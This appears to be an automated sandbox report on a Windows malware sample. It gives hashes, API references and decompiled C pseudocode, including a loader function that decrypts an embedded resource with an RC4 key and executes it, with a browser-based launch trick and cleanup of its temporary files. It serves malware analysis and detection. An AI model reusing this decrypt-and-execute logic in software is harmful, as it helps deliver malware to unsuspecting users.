Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: aa650641004e27e9a5f368425580be188142e03bb9e637c8b463a0830571530e
Instruction ID: 063d55d0408538064a6ab3a90532cc0ca8c05583f3491d3b9c00d4756e0e5f0e
Opcode Fuzzy Hash: aa650641004e27e9a5f368425580be188142e03bb9e637c8b463a0830571530e
Instruction Fuzzy Hash: 3051C071900208EFDB11CF68C988AAE7BB0FF45350F24857AE919AB2D2D7748E40DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040835F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040835F(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				intOrPtr* _t29;
				int _t30;
				void* _t31;
				int _t33;
				signed short* _t34;
				short* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				int _t42;
				signed char _t46;
				char* _t49;
				char* _t50;

				_t49 = _a8;
				if(_t49 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					_t46 =  *_t49;
					if(_t46 != 0) {
						_t29 = _a20;
						if(_t29 != 0) {
							_t38 =  *_t29;
							_t30 =  *(_t29 + 4);
						} else {
							_t38 =  *0x40f224; // 0x0
							_t30 =  *0x40f234; // 0x0
						}
						if(_t38 != 0) {
							_t50 = _a16;
							if( *_t50 == 0) {
								_t37 =  *0x40e560; // 0x40e56a
								if(( *(_t37 + 1 + (_t46 & 0x000000ff) * 2) & 0x00000080) == 0) {
									_t30 = MultiByteToWideChar(_t30, 9, _t49, 1, _a4, 0 | _a4 != 0x00000000);
									if(_t30 != 0) {
										goto L13;
									}
									L21:
									 *0x40efa4 = 0x2a;
									return _t30 | 0xffffffff;
								}
								_t42 =  *0x40e76c; // 0x1
								if(_a12 >= _t42) {
									if(_t42 <= 1) {
										L27:
										if(_t49[1] != 0) {
											L19:
											_t33 =  *0x40e76c; // 0x1
											return _t33;
										}
										 *_t50 =  *_t50 & 0x00000000;
										goto L21;
									}
									_t30 = MultiByteToWideChar(_t30, 9, _t49, _t42, _a4, 0 | _a4 != 0x00000000);
									if(_t30 != 0) {
										goto L19;
									}
									goto L27;
								}
								 *_t50 = _t46;
								_push(0xfffffffe);
								goto L14;
							}
							_t50[1] = _t46;
							if( *0x40e76c <= 1) {
								L20:
								 *_t50 = 0;
								goto L21;
							}
							_t30 = MultiByteToWideChar(_t30, 9, _t50, 2, _a4, 0 | _a4 != 0x00000000);
							if(_t30 == 0) {
								goto L20;
							}
							 *_t50 = 0;
							goto L19;
						} else {
							_t34 = _a4;
							if(_t34 != 0) {
								 *_t34 = _t46 & 0x000000ff;
							}
							L13:
							_push(1);
							L14:
							_pop(_t31);
							return _t31;
						}
					} else {
						_t35 = _a4;
						if(_t35 != 0) {
							 *_t35 = 0;
						}
						goto L5;
					}
				}
			}

0x00408365
0x0040836c
0x00408383
0x00000000
0x00408373
0x00408373
0x00408377
0x0040838a
0x0040838f
0x0040839e
0x004083a0
0x00408391
0x00408391
0x00408397
0x00408397
0x004083a5
0x004083ba
0x004083bf
0x00408403
0x00408411
0x00408461
0x00408469
0x00000000
0x00000000
0x004083f4
0x004083f4
0x00000000
0x004083fe
0x00408413
0x0040841c
0x00408427
0x00408444
0x00408448
0x004083eb
0x004083eb
0x00000000
0x004083eb
0x0040844a
0x00000000
0x0040844a
0x0040843a
0x00408442
0x00000000
0x00000000
0x00000000
0x00408442
0x0040841e
0x00408420
0x00000000
0x00408420
0x004083c1
0x004083cb
0x004083f2
0x004083f2
0x00000000
0x004083f2
0x004083df
0x004083e7
0x00000000
0x00000000
0x004083e9
0x00000000
0x004083a7
0x004083a7
0x004083ac
0x004083b2
0x004083b2
0x004083b5
0x004083b5
0x004083b7
0x004083b7
0x00000000
0x004083b7
0x00408379
0x00408379
0x0040837e
0x00408380
0x00408380
0x00000000
0x0040837e
0x00408377

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000), ref: 004083DF
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 0040843A
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 00408461

Strings

j@, xrefs: 00408403

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: j@
API String ID: 626452242-1913250263
Opcode ID: 88dfc82478a13292b4adaf5fc1564b8ec97ffeb458ab3aa8f74fa1d8ba83448a
Instruction ID: 2e5c925f93106763c763493ff94fd1699266ff540c1958328e8edf38e98b5771
Opcode Fuzzy Hash: 88dfc82478a13292b4adaf5fc1564b8ec97ffeb458ab3aa8f74fa1d8ba83448a
Instruction Fuzzy Hash: 7631F570104306EFDB208F60DA84A6B3BA5EB81B00F14853EEDC5AA2D1DB769C80D799

Uniqueness

Uniqueness Score: -1.00%

Function 00405693, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405693(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E00405450(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

0x00405693
0x00405693
0x00405698
0x0040569b
0x0040569f
0x004056a4
0x004056a8
0x00405741
0x00405741
0x004056c8
0x004056d7
0x004056d9
0x004056de
0x00000000
0x004056e0
0x004056e0
0x004056eb
0x004056f0
0x004056f3
0x004056f5
0x004056f8
0x00405712
0x00000000
0x0040572b
0x00405739
0x00405739
0x00405712
0x004056de
0x00405749
0x00405754

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,00403D23), ref: 004056C2
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00403D23), ref: 004056D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00403D23), ref: 00405721
CompareStringW.KERNEL32(?,00000000,00000000,?,?,00000000,?,00000000,?,?,?,00403D23), ref: 00405739

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 58db1b16891f65eb51c1b7bb2f02adff7ae438159a16b459b0dcbe769e7157d7
Instruction ID: be65fde93fd66d36b2ad2bbc0943cc497e36727e0c8815195bc47ca2454b5735
Opcode Fuzzy Hash: 58db1b16891f65eb51c1b7bb2f02adff7ae438159a16b459b0dcbe769e7157d7
Instruction Fuzzy Hash: 9B210932900649EBCF219F94CC859DF7FB5FB48750F144226FA15721A0C3369961EF94

Uniqueness

Uniqueness Score: -1.00%

Function 004045EE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004045EE(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x4106e4,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E004051A0(1,  &_v280, 0x100,  &_v1304,  *0x4106e4,  *0x410904, 0);
						E00404F51( *0x410904, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4106e4, 0);
						E00404F51( *0x410904, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4106e4, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x410700) =  *(_t55 + 0x410700) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x410801) =  *(_t55 + 0x410801) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x410700) = _t77;
								goto L16;
							}
							 *(_t55 + 0x410801) =  *(_t55 + 0x410801) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x410700) =  *(_t43 + 0x410700) & 0x00000000;
						} else {
							 *(_t43 + 0x410801) =  *(_t43 + 0x410801) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x410801) =  *(_t43 + 0x410801) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x410700) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x0040460b
0x00404611
0x00404618
0x00404618
0x0040461f
0x00404620
0x00404624
0x00404627
0x00404630
0x00404669
0x00404688
0x004046ac
0x004046d4
0x004046dc
0x004046de
0x004046e4
0x004046e4
0x004046ea
0x00404705
0x00404717
0x00000000
0x00404717
0x00404707
0x0040470e
0x004046fa
0x004046fa
0x00000000
0x004046fa
0x004046ec
0x004046f3
0x00000000
0x0040471e
0x0040471e
0x00404720
0x00404721
0x00000000
0x004046e4
0x00404634
0x00404637
0x00404637
0x0040463a
0x0040463f
0x00404643
0x0040464a
0x00404652
0x0040465c
0x0040465c
0x0040465c
0x0040465f
0x00404660
0x00404663
0x00000000
0x00404668
0x00404727
0x0040472e
0x00404731
0x0040474f
0x00404764
0x00404756
0x00404756
0x0040475f
0x00000000
0x0040475f
0x00404738
0x00404738
0x00404741
0x00404744
0x00404744
0x00404744
0x0040476b
0x0040476c
0x00404772

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00404602

Strings

, xrefs: 0040464B
, xrefs: 00404627

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 4444aa8d7da064d58e8d0a1b204f47f3315b4c5e9ccd75e9d468bb3b92cdceba
Instruction ID: 1080f7578a907230f95c2f44c8e2f0c4d0db4fc4991231efd6f5e5fa4597ea85
Opcode Fuzzy Hash: 4444aa8d7da064d58e8d0a1b204f47f3315b4c5e9ccd75e9d468bb3b92cdceba
Instruction Fuzzy Hash: 7F417BB10042985EEB129764CE49BFB3F99DB83700F1404F6D749E71D2C7BA4984CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004053D3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053D3() {
				char* _v4;
				short* _t4;
				char* _t6;
				short** _t14;
				int _t15;

				_t14 =  *0x40efd4; // 0x0
				_t4 =  *_t14;
				if(_t4 == 0) {
					L6:
					return 0;
				}
				while(1) {
					_t6 = WideCharToMultiByte(1, 0, _t4, 0xffffffff, 0, 0, 0, 0);
					_t15 = _t6;
					if(_t15 == 0) {
						break;
					}
					_t6 = E00401F8B(_t15);
					_v4 = _t6;
					if(_t6 == 0) {
						break;
					}
					_t6 = WideCharToMultiByte(1, 0,  *_t14, 0xffffffff, _t6, _t15, 0, 0);
					if(_t6 == 0) {
						break;
					}
					_t2 =  &_v4; // 0x403d23
					E00405755( *_t2, 0);
					_t4 = _t14[1];
					_t14 =  &(_t14[1]);
					if(_t4 != 0) {
						continue;
					}
					goto L6;
				}
				return _t6 | 0xffffffff;
			}

0x004053d7
0x004053e0
0x004053e4
0x00405434
0x00000000
0x00405434
0x004053ec
0x004053f6
0x004053f8
0x004053fc
0x00000000
0x00000000
0x004053ff
0x00405407
0x0040540b
0x00000000
0x00000000
0x00405418
0x0040541c
0x00000000
0x00000000
0x0040541f
0x00405423
0x00405428
0x0040542b
0x00405432
0x00000000
0x00000000
0x00000000
0x00405432
0x00000000

APIs

WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,021E0E00,00000000,?,?,00404EF7,00000000,00401586), ref: 004053F6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00404EF7,00000000,00401586,?,00403D52,0040C49C,?), ref: 00405418

Strings

#=@y"@, xrefs: 0040541F

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: #=@y"@
API String ID: 626452242-2014422622
Opcode ID: ed89285eb5713ad0009ad110d74f044f72fdcb4154208462bb0c2d2f79b846b3
Instruction ID: e291d5219e47da3f92f3b56b7dc1f6f2a813dd76b424de1c8fee73efc1c74300
Opcode Fuzzy Hash: ed89285eb5713ad0009ad110d74f044f72fdcb4154208462bb0c2d2f79b846b3
Instruction Fuzzy Hash: F001D6312045417AD730565B9C84E6B7BACDBC2B31B24073FF524F21E2DA719C40C974

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: yw6At7QnNh.exe PID: 5952 Parent PID: 3420 yw6At7QnNh.exeCOMMON

Executed Functions

Function 00401282, Relevance: 91.4, APIs: 46, Strings: 6, Instructions: 426
encryptionfilewindowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401282() {
				unsigned int _v8;
				void* _v12;
				struct HINSTANCE__* _v16;
				void* _v20;
				long* _v24;
				char _v28;
				char* _v32;
				char* _v36;
				int _v40;
				unsigned int _v44;
				void* _v48;
				void* _v60;
				struct tagMSG _v88;
				void _v347;
				char _v348;
				void _v607;
				char _v608;
				void _v867;
				char _v868;
				void _v1127;
				char _v1128;
				void _v1387;
				char _v1388;
				void _v1647;
				char _v1648;
				struct HWND__* _t152;
				long _t162;
				void* _t163;
				signed int _t166;
				char* _t170;
				int _t173;
				int _t176;
				int _t178;
				void* _t179;
				void* _t181;
				intOrPtr _t186;
				void* _t187;
				void* _t203;
				void* _t217;
				struct HINSTANCE__* _t230;
				struct HRSRC__* _t244;
				intOrPtr* _t245;
				signed int _t247;
				signed int _t255;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				signed int _t270;
				signed int _t275;
				unsigned int _t283;
				struct HRSRC__* _t292;
				void* _t293;
				BYTE* _t306;
				CHAR* _t317;
				void* _t319;
				void* _t323;
				char* _t324;
				void* _t326;
				void* _t329;
				void* _t331;
				void* _t333;

				_v868 = _v868 & 0x00000000;
				_t247 = 0x40;
				memset( &_v867, 0, _t247 << 2);
				_v1128 = _v1128 & 0x00000000;
				_push(0x40);
				asm("stosw");
				asm("stosb");
				_v608 = _v608 & 0x00000000;
				memset( &_v1127, 0, 0 << 2);
				asm("stosw");
				asm("stosb");
				_push(0x40);
				memset( &_v607, 0, 0 << 2);
				_t329 = _t326 + 0x24;
				asm("stosw");
				asm("stosb");
				GetModuleFileNameA(0,  &_v1128, 0x104);
				GetEnvironmentVariableA("TEMP",  &_v868, 0x104);
				GetEnvironmentVariableA("APPDATA",  &_v608, 0x104);
				_v16 = 0;
				do {
					_t152 = GetDesktopWindow();
					_v8 = _t152;
					_v12 = 0;
					while(PeekMessageA( &_v88, _t152, 0, 0, 1) != 0 && _v12 < 0xc350) {
						if(_v44 != 0xffffffff) {
							if(IsWindow(_v8) == 0 || IsDialogMessageA(_v8,  &_v88) == 0) {
								TranslateMessage( &_v88);
								DispatchMessageA( &_v88);
							}
						} else {
							Sleep(0x64);
						}
						IsDlgButtonChecked(_v8, 7);
						_t152 = GetDesktopWindow();
						_v12 = _v12 + 1;
						_v8 = _t152;
					}
					_t244 = FindResourceA(0, 1, 0x15);
					_v12 = LoadResource(0, _t244);
					_v8 = SizeofResource(0, _t244);
					_t245 = LockResource(_v12);
					if(_v8 <= 0) {
						L41:
						return 0;
					}
					_v16 =  &(_v16[1]);
				} while (_v16 < 0xc350);
				_t292 = FindResourceA(0, 1, 0x14);
				_v12 = LoadResource(0, _t292);
				_t162 = SizeofResource(0, _t292);
				_v8 = _t162;
				_t163 = _t162 + 0x64;
				_push(_t163); // executed
				L004024E8(); // executed
				_t293 = _t163;
				_v16 = _t293;
				_t319 = LockResource(_v12);
				_t255 = _v8 >> 2;
				_t166 = memcpy(_t293, _t319, _t255 << 2);
				_t44 = _t245 + 0xba; // 0xba
				_t170 = memcpy(_t319 + _t255 + _t255, _t319, _t166 & 0x00000003);
				_t331 = _t329 + 0x18;
				PathCombineA(_t170,  &_v608, _t44); // executed
				_t173 = PathFileExistsA( &_v608); // executed
				_v12 = _t173;
				_t174 =  *((intOrPtr*)(_t245 + 4));
				_v36 = 0;
				if( *((intOrPtr*)(_t245 + 4)) != 0) {
					_v36 = E00401FB0( &_v868, _t174,  &_v868);
				}
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_t176 = CryptAcquireContextA( &_v24, 0, "Microsoft Base Cryptographic Provider v1.0", 1, 0); // executed
				if(_t176 == 0) {
					CryptAcquireContextA( &_v24, 0, "Microsoft Base Cryptographic Provider v1.0", 1, 8); // executed
				}
				__imp__CryptCreateHash(_v24, 0x8003, 0, 0,  &_v28);
				_t178 = _v8;
				_v40 = _t178;
				_t179 = _t178 + 0x64;
				L004024E8(); // executed
				_v20 = _t179;
				L004024E8();
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t262 = _v40;
				_t323 = _v16;
				_t263 = _t262 >> 2;
				memcpy(_v20, _t323, _t263 << 2);
				_t181 = memcpy(_t323 + _t263 + _t263, _t323, _t262 & 0x00000003);
				_t333 = _t331 + 0x18;
				_t324 = 0;
				__imp__CryptHashData(_v28, _t181, 0xa, 0, "true", _t179);
				__imp__CryptDeriveKey(_v24, 0x6801, _v28, 0,  &_v32); // executed
				_t306 = _v20;
				CryptDecrypt(_v32, 0, 1, 0, _t306,  &_v40);
				_t185 =  *_t245;
				_v16 = _t306;
				if( *_t245 != 0) {
					_t230 = E00401000(_t185, 0, _t306, _v8, _t185);
					_t333 = _t333 + 0xc;
					_v16 = _t230;
				}
				_t186 =  *((intOrPtr*)(_t245 + 0x18));
				if(_t186 <= _t324 || _v12 != _t324) {
					if(_t186 != 1) {
						goto L23;
					}
					goto L21;
				} else {
					L21:
					_t81 = _t245 + 0x20; // 0x20
					_t317 = _t81;
					do {
						_t83 = _t245 + 0x52; // 0x52
					} while (MessageBoxA(_t324, _t83, _t317,  *(_t245 + 0x1c)) == 4);
					L23:
					_t187 =  *(_t245 + 0xc);
					if(_t187 <= _t324 || _v12 != _t324) {
						if(_t187 != 1) {
							goto L31;
						}
						goto L26;
					} else {
						L26:
						_push(0x70);
						L004024E8();
						_t283 =  *((intOrPtr*)(_t245 + 0x10)) + _v16;
						_v48 = _t187;
						_v20 = _t324;
						_v44 = _t283;
						if( *((intOrPtr*)(_t245 + 0x14)) <= _t324) {
							L31:
							Sleep( *(_t245 + 8)); // executed
							if(_v36 == _t324) {
								E00401046( &_v1128, _v16, GetCommandLineA()); // executed
								_t333 = _t333 + 0xc;
							}
							if(_v12 == _t324) {
								_t217 = CreateFileA( &_v608, 0xc0000000, _t324, _t324, 2, 2, _t324); // executed
								if(_t217 != 0xffffffff) {
									FindCloseChangeNotification(_t217); // executed
								}
							}
							if( *((intOrPtr*)(_t245 + 0xb6)) != _t324 && _v12 == _t324) {
								_v1388 = _v1388 & 0x00000000;
								_t270 = 0x40;
								_v348 = _v348 & 0x00000000;
								memset( &_v1387, 0, _t270 << 2);
								asm("stosw");
								asm("stosb");
								_push(0x40);
								memset( &_v347, 0, 0 << 2);
								_t333 = _t333 + 0x18;
								asm("stosw");
								asm("stosb");
								PathCombineA( &_v348,  &_v868, "MSDefaultBrowser.html");
								_t203 = CreateFileA( &_v348, 0xc0000000, _t324, _t324, 2, 0x80, _t324);
								if(_t203 != 0xffffffff) {
									CloseHandle(_t203);
									FindExecutableA( &_v348, _t324,  &_v1388);
									DeleteFileA( &_v348);
									E00401046( &_v1388,  *((intOrPtr*)(_t245 + 0xb6)) + _v16, _t324);
									_t333 = _t333 + 0xc;
									DeleteFileA( &_v348);
								}
							}
							Sleep(0x1f4); // executed
							_v1648 = _v1648 & 0x00000000;
							_t268 = 0x40;
							memset( &_v1647, 0, _t268 << 2);
							asm("stosw");
							asm("stosb");
							PathCombineA( &_v1648,  &_v868, _t245 + 0xc9);
							DeleteFileA( &_v1648); // executed
							goto L41;
						}
						_v8 = _t283;
						while(1) {
							_t275 = 0x1c;
							_t97 = memcpy(_t187, _v8, _t275 << 2) + 0xc; // 0xc
							E004011C7( &_v868,  *((intOrPtr*)(_t222 + 8)) + _t283,  *((intOrPtr*)(_t222 + 4)),  *_t222, _t97);
							_v8 = _v8 + 0x70;
							_t333 = _t333 + 0x20;
							_v20 = _v20 + 1;
							if(_v20 >=  *((intOrPtr*)(_t245 + 0x14))) {
								break;
							}
							_t187 = _v48;
							_t283 = _v44;
						}
						_t324 = 0;
						goto L31;
					}
				}
			}

0x0040128b
0x00401299
0x004012a0
0x004012a2
0x004012a9
0x004012ab
0x004012ad
0x004012b7
0x004012be
0x004012c0
0x004012c2
0x004012c3
0x004012ce
0x004012ce
0x004012d0
0x004012d2
0x004012e3
0x004012fc
0x0040130b
0x00401313
0x00401316
0x0040131c
0x0040131e
0x00401321
0x00401324
0x00401344
0x0040135b
0x00401372
0x0040137c
0x0040137c
0x00401346
0x00401348
0x00401348
0x00401387
0x0040138d
0x0040138f
0x00401392
0x00401392
0x0040139e
0x004013aa
0x004013b6
0x004013c2
0x004013c4
0x0040174f
0x00401753
0x00401753
0x004013ca
0x004013cd
0x004013e1
0x004013ed
0x004013f0
0x004013f6
0x004013f9
0x004013fc
0x004013fd
0x00401403
0x00401408
0x00401414
0x00401418
0x0040141b
0x0040141f
0x00401436
0x00401436
0x00401439
0x00401446
0x0040144c
0x0040144f
0x00401456
0x00401459
0x00401469
0x0040146c
0x00401480
0x00401483
0x00401486
0x00401489
0x0040148d
0x0040149d
0x0040149d
0x004014ad
0x004014b3
0x004014b6
0x004014b9
0x004014bd
0x004014c4
0x004014c7
0x004014d4
0x004014d5
0x004014d6
0x004014d8
0x004014de
0x004014df
0x004014e2
0x004014e4
0x004014e7
0x004014ef
0x004014f2
0x004014f9
0x004014f9
0x004014fb
0x00401504
0x0040151a
0x00401520
0x0040152f
0x00401535
0x00401537
0x0040153c
0x00401543
0x00401548
0x0040154b
0x0040154b
0x0040154e
0x00401553
0x0040155d
0x00000000
0x00000000
0x00000000
0x0040155f
0x0040155f
0x0040155f
0x0040155f
0x00401562
0x00401565
0x00401571
0x00401576
0x00401576
0x0040157b
0x00401585
0x00000000
0x00000000
0x00000000
0x00401587
0x00401587
0x00401587
0x00401589
0x00401592
0x00401598
0x0040159b
0x0040159e
0x004015a1
0x004015e7
0x004015ea
0x004015f3
0x00401606
0x0040160b
0x0040160b
0x00401611
0x00401626
0x0040162f
0x00401632
0x00401632
0x0040162f
0x0040163e
0x0040164d
0x00401656
0x0040165f
0x00401666
0x00401668
0x0040166a
0x0040166b
0x00401676
0x00401676
0x00401678
0x0040167a
0x0040168e
0x004016aa
0x004016b3
0x004016b6
0x004016cb
0x004016de
0x004016f2
0x004016f7
0x00401701
0x00401701
0x004016b3
0x00401708
0x0040170e
0x00401717
0x00401726
0x00401728
0x0040172a
0x0040173a
0x00401747
0x00000000
0x00401747
0x004015a3
0x004015ae
0x004015b3
0x004015b8
0x004015ce
0x004015d3
0x004015d7
0x004015da
0x004015e3
0x00000000
0x00000000
0x004015a8
0x004015ab
0x004015ab
0x004015e5
0x00000000
0x004015e5
0x0040157b

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,00000000), ref: 004012E3
GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,?,?,00000000), ref: 004012FC
GetEnvironmentVariableA.KERNEL32(APPDATA,00000000,00000104,?,?,00000000), ref: 0040130B
GetDesktopWindow.USER32 ref: 0040131C
PeekMessageA.USER32 ref: 0040132D
Sleep.KERNEL32(00000064,?,?,00000000), ref: 00401348
IsWindow.USER32(0000000A), ref: 00401353
IsDialogMessageA.USER32(0000000A,?,?,?,00000000), ref: 00401364
TranslateMessage.USER32(?), ref: 00401372
DispatchMessageA.USER32 ref: 0040137C
IsDlgButtonChecked.USER32(0000000A,00000007), ref: 00401387
GetDesktopWindow.USER32 ref: 0040138D
FindResourceA.KERNEL32(00000000,00000001,00000015), ref: 0040139C
LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013A2
SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013AD
LockResource.KERNEL32(?,?,?,00000000), ref: 004013B9
FindResourceA.KERNEL32(00000000,00000001,00000014), ref: 004013DF
LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013E5
SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 004013F0
??2@YAPAXI@Z.MSVCRT ref: 004013FD
LockResource.KERNEL32(?,?,?,00000000), ref: 0040140B
PathCombineA.KERNELBASE(00000000,00000000,000000BA,?,?,00000000), ref: 00401439
PathFileExistsA.KERNELBASE(00000000,?,?,00000000), ref: 00401446
CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,?,?,00000000), ref: 00401489
CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008,?,?,00000000), ref: 0040149D
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000), ref: 004014AD
??2@YAPAXI@Z.MSVCRT ref: 004014BD
??2@YAPAXI@Z.MSVCRT ref: 004014C7
CryptHashData.ADVAPI32(?,00000000,0000000A,00000000,?,?,00000000), ref: 00401504
CryptDeriveKey.ADVAPI32(?,00006801,?,00000000,?,?,?,00000000), ref: 0040151A
